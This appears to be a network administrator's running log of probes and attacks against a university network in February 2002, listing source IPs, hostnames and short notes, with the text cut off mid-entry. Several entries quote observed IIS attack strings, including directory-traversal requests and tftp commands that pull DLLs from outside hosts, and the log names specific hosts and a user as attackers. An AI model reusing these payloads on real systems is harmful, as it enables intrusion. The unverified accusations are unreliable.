Short summary of some of the attacks against us for Feb. 2002 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2002/02/01-05:44:20.17 195.92.95.61 (ariston.netcraft.com) scannet for port 80 2002/02/01-18:32:34 210.178.40.3 (Korea crap) scannet for port 22 2002/02/01-23:23:59.35 24.240.23.42 (24-240-23-42.hsacorp.net) scannet for port 80 2002/02/02-00:07:47.30 164.58.10.124 (cf4.onenet.net) scannet for port 80 2002/02/02-01:30:14.69 207.106.130.37 (Net Access,PA,US) scannet with ping 2002/02/02-03:16:20.77 203.43.135.225 (baysid10.baysidegrp.com.au) scannet for port 6112,1524,21,515 2002/02/02-03:16:38.44 200.193.77.164 (adsl-jve-164-a.brt.telesc.net.br) buff overflow attack port 6112 on multiplt machines. 2002/02/02-03:24:27.38 213.11.84.1 (france) scannetfor port 80 2002/02/02-05:22:41.38 210.200.145.209 (dial1479-nk.hitron.net) scannet for port 3128,8080,8000 2002/02/02-05:27:09.80 210.200.145.209 (dial1479-nk.hitron.net) scannet for port 8080 2002/02/02-10:19:42 64.45.60.77 (NETlimited,CA,US) scannet for port 22 2002/02/02-12:53:00.13 210.200.142.146 (dial654-nk.hitron.net) scannet for port 8080,8000,3128 2002/02/02-15:24:13.40 172.176.29.185 (ACB01DB9.ipt.aol.com)scannet for port 21 2002/02/02-15:33:53 200.221.91.38 (200-221-91-38.dsl-sp.uol.com.br) scannet for port 22 2002/02/02-15:52:57.87 206.153.70.149 (chris.odigi.com)sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/02-16:25:16 134.60.29.43 (mrm-43.e-technik.uni-ulm.de) scannet for port 22 2002/02/02-16:28:08.56 134.174.164.28 (hcnr.med.harvard.edu) buff overflow attack on sshd on 132.235.15.201 2002/02/02-16:57:09.17 208.41.56.210 (208-41-56-210.client.dsl.net) scannet for port 515 2002/02/02-17:15:18.87 172.176.29.170 (ACB01DAA.ipt.aol.com) scannet for port 21 2002/02/02-18:35:23.79 209.71.245.162 (bodyhosting.com)sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/02-18:40:05.79 210.200.144.43 (dial1059-nk.hitron.net) scannet for port 8080 2002/02/02-19:20:42 208.0.227.162 (Cable & Wireless,Saint John,An,AG) scannet for port 22 2002/02/02-19:39:48.55 213.61.26.6 (h-213.61.26.6.host.de.colt.net) sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/02-23:40:11.84 218.51.121.238 (Hanaro Telecom Co.,KR) scannet for port 21 2002/02/03-05:56:27.33 195.54.102.4 (ircu.bredband.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/03-06:28:31.62 172.188.28.159 (ACBC1C9F.ipt.aol.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/04-02:47:42.45 66.70.46.140 (HiSpeed Hosting,NJ,US) scannet w/ 1 packet to high num port per ip. slow scan 2002/02/04-06:05:12.33 66.70.46.140 (HiSpeed Hosting,NJ,US) scannet w/ 1 packet to high num port per ip,every 3 minutes 2002/02/04-06:21:05.14 198.186.203.48 (Dandelion Digital-cvs.kde.org) scannet w/ 1 packet to high num port per ip, 3-10 mins 2002/02/04-06:25:46.32 62.4.67.75 (NetGameZone.de) scannet w/ 1 packet to high num port per ip. slow scan 2002/02/04-06:34:29.37 62.4.67.102 (NetGameZone.de) scannet w/ 1 packet to high num port per ip. slow scan 2002/02/04-06:34:29.52 62.4.67.102 (NetGameZone.de) scannet for ports 1024, 3072 2002/02/04-07:15:10 132.235.234.235 (wasp.cns.ohiou.edu) scannet for port 137 2002/02/04-07:17:48 132.235.250.15:67 (pointer dhcp1.cns.ohiou.edu) scannet for port 58 2002/02/04-07:55:43.81 64.23.48.70 (SkyNetWEB,MD,US) 1. scannet w/ 1 packet to high num port per ip. slow scan 2002/02/04-07:55:43.81 64.23.48.70 (SkyNetWEB,MD,US) 2. reverse lookup of ip is owns.the.mafia.org.au 2002/02/04-10:08:24.05 66.24.145.229 (bgm-66-24-145-229.stny.rr.com) scannet for port 21 2002/02/04-10:11:29.74 24.128.16.33 (h00a0244c704c.ne.mediaone.net) scannet for port 21 2002/02/04-10:16:43 144.138.213.125:1564 (Telstra,CANBERRA, AU) scannet for port 25 2002/02/04-11:09:03 132.235.90.7 (some stupid OHIOU.EDU host) scannet for port 138,139,38293 2002/02/04-15:04:44.38 61.139.60.71 (CHINANET Sichuan province network) sc annet w/ 1 packet to high num port per ip. slow scan 2002/02/04-18:51:03.42 216.227.60.122 (rm-f.net) scannet w/ 1 packet to high num port per ip, 3-10 mins 2002/02/04-19:53:11.45 205.149.142.63 (www.sillslaw.com) scannet for port 21 2002/02/04-19:53:12.31 207.158.132.66 (bratwurst.coast.net) scannet for port 21 2002/02/04-20:10:56.27 217.136.153.9 (adsl-71945.turboline.skynet.be) scannet for port 21 2002/02/04-21:55:04.45 66.130.202.167 (modemcable167.202-130-66.que.mc.videotron.ca) scannet for port 21 2002/02/04-23:29:00.30 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) connect to 132.235.16.217 port 69 2002/02/04-23:30:07.76 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet fo rport80, code red attacks. 2002/02/05-02:04:25.75 129.71.103.10 (stude-nt.salem-teikyo.wvnet.edu) scannet for port 23 2002/02/05-04:15:31.75 172.160.250.164 (ACA0FAA4.ipt.aol.com) scannet w/ 1 packet to high num port per ip, every 3 minutes 2002/02/05-07:15:36.10 128.121.27.82 (narcoti.ca(Verio, Inc.)) scannet w/ 1 packet to high num port per ip, every 3 minutes 2002/02/05-07:57:02.01 66.24.145.229 (bgm-66-24-145-229.stny.rr.com) scannet for port 21 2002/02/05-07:57:02.15 24.128.16.33 (h00a0244c704c.ne.mediaone.net) scannet for port 21 2002/02/05-08:56:26.05 64.215.166.35 (Akamai Technologies/S.F.,MA.US) scannet w/ 1 packet to high num port per ip, every 3 minutes 2002/02/05-09:28:24 132.235.238.1 (admin.memaud.ohiou.edu) scannet for port 38293, 139 2002/02/05-10:04:43.74 204.152.186.58 (proxy8.monitor.dal.net) scan 132.235.2.111 for ports 3128,80,1080,8080 2002/02/05-13:12:10.12 172.129.136.47 (AC81882F.ipt.aol.com) pound on 132.235.3.246:6346 about 1k tries. to 2002/02/05-15:42:46.91 2002/02/05-13:50:19.53 157.238.46.35 (Verio, Inc.) scannet w/ 1 packet to high num port per ip, every 3 minutes 2002/02/05-15:55:25.04 172.155.207.170 (AC9BCFAA.ipt.aol.com) pound on 132.235.3.246:6346 till 2002/02/05-21:30:38.63 2002/02/05-22:57:52.50 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) attack IIS server w/cmds such as GET /scripts/roo.exe?/c+dir 2002/02/06-01:57:59.52 211.62.43.122 (korea crap) scnannet for port 515 2002/02/06-03:32:31.86 205.238.235.70 (svcr-adsl-205-238-235-70.epix.net) scannet for port 515 2002/02/06-09:17:50.91 217.85.120.95 (pD955785F.dip.t-dialin.net) scannet for port 21 2002/02/06-09:28:41 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293 2002/02/06-11:21:42.9 132.248.62.62 (fmvz62.veterin.unam.mx) 1. start of probes of web servers on net 2002/02/06-15:52:05.14 132.235.70.166 (dhcp-070-166.CNS.OhioU.Edu) attack multiple IIS server w GET /scripts/..%5c.. attacks 2002/02/06-16:10:51.6 131.211.67.101 (knagserver.geog.uu.nl) 1. attack IIS server on 132.235.16.101 w/ buff overflow cmd 2002/02/06-16:10:51.6 131.211.67.101 (knagserver.geog.uu.nl) 2. cmd.exe?/c+ping+-v+udp+-n+3000+-l+62000+-w+0+irc.win.va.us.xentonix.net 2002/02/06-16:50:52.18 211.207.15.12 (HANANET,KR) scannet for port 21, anon ftp attacks 2002/02/06-17:41:16.37 152.7.5.232 (trl3899rnt.rh.ncsu.edu) scannet for port 22 2002/02/06-20:41:17.34 172.175.97.195 (ACAF61C3.ipt.aol.com) pound on 132.235.3.246:6346 3x/min 2002/02/06-21:43:07.86 2002/02/06-22:42:31.01 132.248.62.62 (fmvz62.veterin.unam.mx) 2. attack IIS servers w/ buff overflow cmd 2002/02/06-22:42:31.01 132.248.62.62 (fmvz62.veterin.unam.mx) 3. tftp%20-i%20132.248.62.62%20GET%20Admin.dll%20c:\Admin.dll 2002/02/06-23:26:25.95 129.79.150.163 (Indiana University ,IN,US) scannet for port 80 2002/02/07-03:53:16.75 66.27.204.160 (sc-66-27-204-160.socal.rr.com) portscan 132.235.201.225 2002/02/07-05:10:57 24.160.75.130 (cs2416075-130.houston.rr.com) scannet for port 80 2002/02/07-06:49:26.23 195.22.39.156 (,EN-DATA spol. s r.o.,Plzen,CZ) scannet for port 21,22,23 2002/02/07-10:38:48 12.111.51.212 (BPA INTERNATIONAL,CT,US) scan several machiens for port 137 2002/02/07-11:06:05.05 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for port 80 2002/02/07-13:30:38.16 64.26.65.76 (admiral.soc.lib.md.us) scannet for port 111 2002/02/07-13:33:20 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293 2002/02/07-14:30:26.41 132.235.62.224 (dhcp-062-224.cns.ohiou.edu) scannet fo rports 137,139,445 2002/02/07-14:32:52.44 132.235.62.224 (dhcp-062-224.cns.ohiou.edu) probe 132.235.1.180 heavily 2002/02/07-14:56:26.60 212.65.0.164 (www.sveb.de) scannet for port 22 2002/02/07-21:33:38 132.235.238.1 (admin.memaud.ohiou.edu) scannet for ports 138,139,38293 2002/02/07-23:52:22.62 64.232.199.18 (ATHM-64-232-xxx-18.home.net) scannet w/ 1 packet to high num port per ip, every 3 minutes 2002/02/08-02:32:51.78 65.93.234.13 (Quebec-HSE-ppp3623060.sympatico.ca) scannet for port 21,anon ftp attacks 2002/02/08-07:18:03.81 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/08-09:02:02.85 132.235.94.25 (another stupid OU address) scannet for port 31524(UDP) user sgjain@bobcat.ent.ohiou.edu 2002/02/08-09:10:32.39 210.9.198.22 (qua138728-2.gw.connect.com.au) unprovoked IPSEC security key connect? attack? query? 2002/02/08-11:50:07.19 132.235.47.5 (dhcp-047-005.cns.ohiou.edu) bang on port 389 on 132.235.1.[1,2] 2002/02/08-13:58:37.79 129.70.11.251 (University of Bielefeld,DE) scan several iops for pot 2015, 1024 2002/02/08-19:42:42.71 217.225.222.167 (pD9E1DEA7.dip.t-dialin.net) scannet for port 21 2002/02/08-21:54:47.92 62.80.113.140:65000 (AboveNet, DE) scannet for port 3072,1024 2002/02/08-22:22:41.67 62.80.113.140 (AboveNet,DE) scan several ips for ports 1024,3072 2002/02/09-01:37:30.58 207.32.225.75 (status.elkhart.net) scannet for port 6112 2002/02/09-02:58:14.90 210.9.198.22 (qua138728-2.gw.connect.com.au) connect to 132.235.201.218 ports 80, 500 2002/02/09-05:22:33.84 212.187.98.97 (c98097.upc-c.chello.nl) 1. attack IIS servers w/buff overflow attack w/commands: 2002/02/09-05:22:33.84 212.187.98.97 (c98097.upc-c.chello.nl) 2. tftp.exe/?+-i+129.2.17.42+GET+JAsfv.dll+c:/recycler/_/_tmp/JAsfv.dll 2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 1. ongoing attacks agains hostst hit from 212.187.98.97 2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 2. cmd: tftp.exe/?+-i+129.2.17.42+GET+acxro3.tmp+c:/recycler/_/_tmp/acxro3.tmp 2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 3. cmd: tftp.exe/?+-i+151.198.183.48+GET+acxro3.tmp+c:/recycler/_/_tmp/acxro4.tmp 2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 4. transfer data to/from 136.142.230.144 (itis-web.upj.pitt.edu) 2002/02/09-05:57:07.57 193.48.37.4 (test.ensait.fr) 5. transfer data to/from 136.142.230.135 (is.upj.pitt.edu) 2002/02/09-09:28:16.31 195.25.239.33 (haillan.sep-haillan.fr) scan part of net for port 22 2002/02/09-10:57:34.37 130.89.225.60 (cam047420.student.utwente.nl) hit 132.235.3.233 port 1250 5x/min til 2002/02/09-10:58:07.66 2002/02/09-12:02:03.14 128.112.37.137 (pku1.Princeton.EDU) zone transfer attampt from DNS 2002/02/09-12:04:29.72 128.112.37.137 (pku1.Princeton.EDU) scannet for port 21 2002/02/09-12:08:57.56 128.112.37.137 (pku1.Princeton.EDU) 1. anon ftp attacks w/ site exec buff overflows (/sbin/route command) 2002/02/09-12:08:57.56 128.112.37.137 (pku1.Princeton.EDU) 2. attack 132.235.1.2 every 3 secs till 2002/02/09-16:01:53.32 2002/02/09-13:24:52.52 200.206.211.44 (200-206-211-44.dsl.telesp.net.br) scannet for port 80 2002/02/09-16:04:12.35 128.112.37.137 (pku1.Princeton.EDU) 3. attack 132.235.2.2 every 3 secs till 2002/02/09-17:30:58.04 2002/02/09-16:44:50.13 64.232.199.18 (ATHM-64-232-xxx-18.home.net) scannet w/ 1 packet to high num port per ip to 11-04:26:51.36 2002/02/09-18:02:47.26 128.6.239.167 (rupc.rutgers.edu) scannet w/ 1 packet to high num port per ip to 2002/02/10-21:50:03.75 2002/02/09-19:19:03.63 195.184.183.60 (.columbus.rr.com) portscan 132.235.3.151 2002/02/09-20:01:30.21 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip to 2002/02/11-02:07:32.60 2002/02/09-22:07:53.99 64.56.236.96 (static-b2-96.highspeed.eol.ca) scannet for port 21 2002/02/09-23:10:00.05 172.190.11.66 (ACBE0B42.ipt.aol.com) scannet w/ 1 packet to high num port per ip to 2002/02/11-02:46:24.69 2002/02/09-23:28:46.11 64.81.20.197 (dsl081-020-197.sea1.dsl.speakeasy.net) scannet for port 21 2002/02/09-23:33:50.36 64.81.20.197 (dsl081-020-197.sea1.dsl.speakeasy.net) buff overflow attacks on port 6112 2002/02/09-23:49:43.12 216.119.0.191 (JPS.Net,CA,US) scannet w/ 1 packet to high num port per ip 2002/02/09-23:54:36.28 65.25.33.25 (dhcp065-025-033-025.neo.rr.com) scannet for port 21 2002/02/10-00:37:32.95 64.56.236.96 (static-b2-96.highspeed.eol.ca) scannet for port 21 2002/02/10-13:48:27.50 80.247.203.72 (VRC,BE) scannet w/ 1 packet to high num port per ip to 2002/02/10-02:30:47.32 2002/02/10-13:54:00.68 200.181.88.180 (ppp180-bsace7009.telebrasilia.net.br) scannet for prt 1433 2002/02/10-14:31:53.52 216.232.8.2:22 (a00e50wfb36ul.bc.hsia.telus.net) scannet for port 22 2002/02/10-17:39:15.96 172.155.21.114 (AC9B1572.ipt.aol.com) proge 132.235.3.246:6346 3x/min til 2002/02/10-18:40:13.65 2002/02/10-18:18:56.26 64.224.111.55 (Interland,GA,US) scannet w/ 1 packet to high num port per ip 2002/02/10-19:52:56.71 62.80.113.81 (AboveNet,DE) scannet w/ 1 packet to high num port per ip 2002/02/10-20:22:25.00 65.113.112.60 (NetFire.com,Dallas,TX,US) scannet w/ 1 packet to high num port per ip to 09-16:28:21.75 2002/02/10-22:51:49.79 66.75.117.126 (sc-66-75-117-126.socal.rr.com) attck ips on port 6346 til 2002/02/11-05:56:14.15 2002/02/11-00:01:18.79 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.3.151 2002/02/11-00:05:46.07 24.208.181.225 (dhcp024-208-181-225.,HU) scannet w/ 1 packet to high num port per ip 2002/02/11-00:05:46.07 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.17.1 2002/02/11-00:27:47.43 12.29.20.132 (msg.Sn00pDog.pentru.o.muie.biz(Yahoo.com)) scannet w/ 1 packet to high num port per ip 2002/02/11-00:52:02.28 65.32.129.136 (6532129hfc136.tampabay.rr.com) probe 132.235.2.103 ports 60000, 10009, 10008 2002/02/11-01:08:47.34 65.24.135.27 ( hcp065-024-135-027.columbus.rr.com) portscat 132.235.1.2 2002/02/11-02:19:29.38 209.141.42.248 (Neo Planet,AZ,US) scan part of net for port 22 2002/02/11-04:00:01.77 208.177.252.17 (O Communications,CA,US) scan part of net for port 22 2002/02/11-05:51:39.42 65.32.129.136 (6532129hfc136.tampabay.rr.com) probe 132.235.3.169 ports 60000, 10009, 10008 2002/02/11-06:00:13.03 172.190.11.66 (ACBE0B42.ipt.aol.com) scannet w/ 1 packet to high num port per ip 2002/02/11-06:09:43.09 12.29.20.132 (msg.Sn00pDog.pentru.o.muie.biz) scannet w/ 1 packet to high num port per ip 2002/02/11-06:28:00.36 65.100.231.34:0 (South Central Communications,UT,US) scannet fo rport 3072,1024 2002/02/11-06:54:00.56 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip 2002/02/11-07:02:57.05 65.100.231.34 (South Central Communications,UT,US) scannet for ports 1024,3072 2002/02/11-08:01:02.54 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.3.0:7151 1 packet 2002/02/11-08:20:25.37 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080,3128,80,1080,23 2002/02/11-13:34:53.98 212.218.174.66 (computerra.fnni.de) scannet for port 22 2002/02/11-13:47:28.39 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.201.0:18971 1 packet 2002/02/11-14:23:31.93 66.28.11.70 (viper.nitro.net) scan 132.235.18.156 for ports 1080, 8080, 3128, 80 23, 9000 2002/02/11-15:35:57.99 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.3.0:17290 1 packet 2002/02/11-17:43:10.72 193.226.123.17 (teddy.ms.fx.ro) scannet w/ 1 packet to high num port per ip 2002/02/11-17:49:31.21 24.82.56.168 (h24-82-56-168.vs.shawcable.net) connect to 132.235.201.0:2570 1 packet 2002/02/11-18:02:24.63 172.128.32.226 (AC8020E2.ipt.aol.com) bang on 132.235.3.246:6346 3x/min till 2002/02/11-19:18:05.37 2002/02/11-18:37:49.37 217.136.2.73 (adsl-33353.turboline.skynet.be) scannet for port 21,anon ftp attack 2002/02/11-19:50:51.15 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.154 for ports 8080,3128,80,1080,23 2002/02/11-19:58:16.25 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.154 for ports 8080,3128,80,1080,23 2002/02/11-21:57:11.82 131.91.80.28 (trout.cse.fau.edu) portscan 132.235.17.1 2002/02/12-00:37:41.99 132.235.170.151 (dhcp-170-151.west-green.ohiou.edu) scannet for port 137 2002/02/12-00:38:11.89 132.235.170.151 (dhcp-170-151.west-green.ohiou.edu) probe 132.235.3.172 ports 445, 139, 137 80 2002/02/12-00:54:48.57 172.170.29.3 (ACAA1D03.ipt.aol.com) ang on 132.235.3.246:6346 3x/min till 2002/02/12-01:27:53.46 2002/02/12-01:55:15. 132.252.134.129 (www.ekt.uni-essen.de) scannet for port 22 2002/02/12-05:56:04.14 198.62.212.109 (Keebler Company,IL,US) scan net for port 80, IIS attacks til 2002/02/13-00:23:17.06 2002/02/12-05:56:04.14 216.81.175.169 (beeline169.beelinecolor.com) 1. scannet for port 80, IIS buff overflow attack 10 packets/sec 2002/02/12-05:56:04.14 216.81.175.169 (beeline169.beelinecolor.com) 2. plus probe port 137 till 2002/02/12-20:30:29.7 2002/02/12-06:28:17.11 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet w/ 1 packet to high num port per ip 2002/02/12-07:16:18.28 66.140.25.157 (ROBERT LEVIN Plano, TX,US) portscan 132.235.3.137 ports 23, 8080, 3128 1080t to 23:56:33.47 2002/02/12-08:20:53.19 80.143.203.56 (p508FCB38.dip.t-dialin.net) conn to 132.235.201.151:20000 8 packets 2002/02/12-10:22:08.34 205.247.210.146 (US Sprint,VA,US) scannet for port 80 2002/02/12-13:17:09.25 207.0.222.20:111 (badger2.badger.org) scannet for port 111 2002/02/12-13:17:11.44 207.0.222.79 (DATAPEX NETWORK SYSTEMS INET,FL,US) scannet for port 111 2002/02/12-14:23:29.19 62.12.114.151 (Menanet Communications,EG) try to login 132.235.1.252 multiple times w/ passwd=login 2002/02/12-14:28:52.72 211.43.165.212 (korea crap) attack 132.235.1.252 port 32772 buff overflow - cmsd, rstatd 2002/02/12-15:28:42.36 165.21.103.174:0 (chatterbox.singnet.com.sg) scan several ips for port 3072 2002/02/12-16:30:38.85 131.238.234.100:0 (lockhace-sec.students.udayton.edu) scan severlips for port 1024,3072 2002/02/12-17:11:24.31 213.107.243.105 (pc3-ipsw3-0-cust105.col.cable.ntl.com) scannet for port 21 2002/02/12-22:21:25.73 61.182.50.241 (CHINANET Hebei province network,CN) scannet for port 111+buff overflow attacs port 32785-statd 2002/02/13-05:05:57.94 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 80 2002/02/13-05:05:58.03 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 80 2002/02/13-05:08:14.48 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 1214 2002/02/13-05:12:58.40 66.123.162.34 (adsl-66-123-162-34.dsl.sntc01.pacbell.net) scannet for port 1214 2002/02/13-05:47:26.96 172.191.182.180 (ACBFB6B4.ipt.aol.com) scannet for port 21 2002/02/13-11:48:59.99 217.128.125.141 (AToulouse-103-1-1-141.abo.wanadoo.fr) scannet for port 21,anon ftp attack 2002/02/13-12:19:41 132.235.90.7 (Gordy Hall. Ohiou.edu) scannet fo prt 38293 2002/02/13-12:21:37 132.235.90.7 (Gordy Hall. Ohiou.edu) scannet fo prt 38293 2002/02/13-16:06:56.20 130.39.51.48:0 (Louisiana State University) scannet for ports 1024,3072 2002/02/13-16:14:23.39 217.225.238.66 (pD9E1EE42.dip.t-dialin.net) scannet for port 21,anon ftp attack 2002/02/13-20:05:42.28 172.161.226.8 (ACA1E208.ipt.aol.com) bang on 132.235.3.246:6346 3x/min til 21:25:01.74 2002/02/13-20:16:30.32 4.33.209.212 (lsanca1-ar5-209-212.lsanca1.dsl.gtei.net) probe 132.235.3.46 ports 12345 27374 139 2002/02/13-21:41:41.19 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red attack against several ips 2002/02/13-21:46:59.54 172.128.169.179 (AC80A9B3.ipt.aol.com) bang on 132.235.3.246:6346 3x/min til 19:32:42.59 2002/02/13-21:58:07.43 132.235.125.231 (dhcp-125-231.cns.ohiou.edu) scan 132.235.3.169 port 5001 2002/02/13-23:34:40.75 172.128.169.179 (AC80A9B3.ipt.aol.com) bang on 132.235.3.246:6346 2x/min til 2002/02/14-01:36:32.84 2002/02/14-01:36:00.02 217.85.34.219 (pD95522DB.dip.t-dialin.net) bang on 132.235.3.37:6346 3x/min til 2002/02/14-08:31:21.59 2002/02/14-04:11:02 193.252.51.105 (AToulon-101-1-1-105.abo.wanadoo.fr) scannet for port 21 2002/02/14-04:11:03.46 193.252.51.105 (AToulon-101-1-1-105.abo.wanadoo.fr) scannet for port 21,anon ftp attack 2002/02/14-05:39:38.49 193.252.51.140 (AToulon-101-1-1-140.abo.wanadoo.fr) scannet for port 21,anon ftp attack 2002/02/14-05:40:02 193.252.51.140 (AToulon-101-1-1-140.abo.wanadoo.fr) scannet for port 21 2002/02/14-07:01:50.31 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080,3128,80,1080,23 2002/02/14-07:20:53 65.208.146.150 (UUNET Technologies) scannet for port 25 2002/02/14-14:44:53.22 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) can several ips ofr port 524 2002/02/14-14:53:22.80 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/02/14-15:25:13.97 204.152.186.58 (proxy8.monitor.dal.net) scan 132.235.4.219 for ports 23,80,81,1080,8080,3128 2002/02/14-18:15:03.45 172.147.136.25 (AC938819.ipt.aol.com) bang on 132.235.3.246:6346 2x/min til 2002/02/14-22:10:03.19 2002/02/14-22:39:31.41 217.128.46.172 (AMontpellier-101-1-2-172.abo.wanadoo.fr) scannet for port 21,anon ftp attack 2002/02/14-22:40:12.03 217.128.46.172 (AMontpellier-101-1-2-172.abo.wanadoo.fr) scannet for port 21 2002/02/14-23:55:45.93 24.240.101.252 (24-240-101-252.hsacorp.net) bang on 132.235.201.27:6346 15x/hr til 2002/02/15-04:42:50.98 2002/02/15-00:45:14.14 217.228.97.165 (pD9E461A5.dip.t-dialin.net) bang on 132.235.3.37:6346 11x til 2002/02/15-04:22:39.20 2002/02/15-02:08:30.55 66.75.117.126 (sc-66-75-117-126.socal.rr.com) probe port 6346 on 132.235.4.26 2002/02/15-04:42:52.89 198.62.212.109 (Keebler Company,IL,US) 1. scannet for port 80 2002/02/15-04:42:52.89 198.62.212.109 (Keebler Company,IL,US) 2. attack IIS w/ tftp%20-i%20132.252.30.155%20GET%20cool.dll%20e:\httpodbc.dll 2002/02/15-04:43:48.38 24.240.101.252 (24-240-101-252.hsacorp.net) bang on 132.235.201.27:6346 2x/min til 15:29:27.86 2002/02/15-04:52:35.92 217.228.97.165 (pD9E461A5.dip.t-dialin.net) con to 132.235.3.37:6346 4x/min til 14:34:12.48 2002/02/15-05:42:02 66.100.217.67 (ICM Computers,MI,US) scannet for port 22 2002/02/15-08:18:10.70 66.20.146.112 (adsl-20-146-112.gsp.bellsouth.net) scan 132.235.18.94 port 27374, 12345, 139 2002/02/15-10:18:51.14 209.214.141.45 (host-209-214-141-45.jax.bellsouth.net) scannet for port 25 2002/02/15-10:28:01.42 210.112.236.9 (korea crap) scannet for port 22 2002/02/15-10:50:52.60 130.228.230.161 (proxy6.monitor.dal.net - Netcetera,DK) scan 132.235.19.185 ports 1080,80,3128,8080,71,80801,23 2002/02/15-10:56:55.15 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) scan 132.235.19.185 1080,80,3128,8080,71,80801,23 2002/02/15-16:58:32.32 172.172.198.43 (ACACC62B.ipt.aol.com) con to 132.235.3.246:6346 4x/min til 21:26:38.64 2002/02/15-18:14:52.26 80.11.33.189 (AReims-101-1-5-189.abo.wanadoo.fr) scannet for port 21 2002/02/15-20:31:15.95 66.20.145.229 (adsl-20-145-229.mem.bellsouth.net) scan 132.235.19.6 port 27374, 12345, 139 2002/02/15-21:27:49.97 172.172.198.43 (ACACC62B.ipt.aol.com) conn to 132.235.3.246:6346 3x/min til 05:19:22.83 2002/02/15-22:04:06.74 80.135.11.116 (p50870B74.dip.t-dialin.net) con to 132.235.3.37:6346 4x/min til 06:30:13.58 2002/02/15-23:02:34.53 66.20.145.229 (adsl-20-145-229.mem.bellsouth.net) connto 132.235.3.217 ports 27374 12345 139 2002/02/16-01:47:35.05 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) start of anon ftp attacks on several ips 2002/02/16-02:34:50.08 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) start of netscan for port 80 2002/02/16-05:53:02.01 66.75.117.126 (sc-66-75-117-126.socal.rr.com) try to connect to 132.235.4.26 : 6346 til 19:43:17.09 2002/02/16-13:04:30.58 24.216.91.172 (24-216-91-172.hsacorp.net) conn to 132.235.201.27:6346 2x/min til 21:51:02.38 2002/02/16-13:26:46.71 62.211.173.171 (Telecom Italia,IT) conn to 132.235.3.32:6346 2x/min til 17:17:24.55 2002/02/16-16:35:59.26 217.228.241.189 (pD9E4F1BD.dip.t-dialin.net) conn to 132.235.201.211:6346 3x/min til 18:41:18.21 2002/02/16-19:29:25.70 131.118.94.98 (cslinux.frostburg.edu) scannet for port 6112,77 2002/02/16-19:29:25.75 131.118.94.98:6112 (cslinux.frostburg.edu) scannet for port 6112 2002/02/16-20:25:59.51 65.92.138.69 (HSE-Montreal-ppp335300.sympatico.ca) attack IIS server w/buff overflow attack. 2002/02/16-20:42:52.25 65.94.96.177 (MTL-HSE-ppp168379.qc.sympatico.ca) connect to 132.235.4.4 : 6346 2002/02/16-21:52:08.68 24.216.91.172 (24-216-91-172.hsacorp.net) conn to 132.235.201.27:6346 3x/min til 23:11:19.14 2002/02/16-22:01:36.55 131.118.94.98 (cslinux.frostburg.edu) 1. attack cde (port 6112) on multiple IPs w/buff overflow attac 2002/02/16-22:01:36.55 131.118.94.98 (cslinux.frostburg.edu) 2. server to be started on port 77 (rje) 2002/02/16-23:42:50.89 202.194.124.130 (Yantai University Library,Shandong,CN) scannet for port 111,buff overflow attacs -rstatd 2002/02/16-23:52:39.22 216.232.8.2 (a00e50wfb36ul.bc.hsia.telus.net) scanent for port 21 2002/02/17-04:56:01.44 63.217.10.114 (63-217-10-114.sdsl.cais.net) scannet for port 111 2002/02/17-07:30:19.77 217.172.160.3 (intergenia GmbH & Co. KG.,DE) scannet for port 22 2002/02/17-09:13:45.54 66.28.45.19 (Cogent Communications,Washington,DC,US) scannet for port 80 2002/02/17-13:22:18.83 172.167.180.216 (ACA7B4D8.ipt.aol.com) conn to 132.235.3.246:6346 3x/min til 02:06:41.67 2002/02/17-14:54:14.46 205.178.108.3 (RCN Corporation,Princeton,NJ,US) scannet for port 21 2002/02/17-18:39:00.61 66.75.117.126 (sc-66-75-117-126.socal.rr.com) try to connect to 132.235.4.26 : 6346 til 23:06:43.09 2002/02/17-19:23:12.93 132.235.166.25 (dhcp-166-025.east-green.ohiou.edu) portscan 132.235.16.100 2002/02/17-22:13:30.59 136.145.57.66 (University of Puerto Rico,PR) scannet for port 6112 2002/02/18-01:45:45.36 12.234.132.150 (12-234-132-150.client.attbi.com) scannet for port 80 2002/02/18-01:46:04.09 12.234.132.150 (12-234-132-150.client.attbi.com) scannet for port 80 2002/02/18-06:08:44.31 198.62.212.109 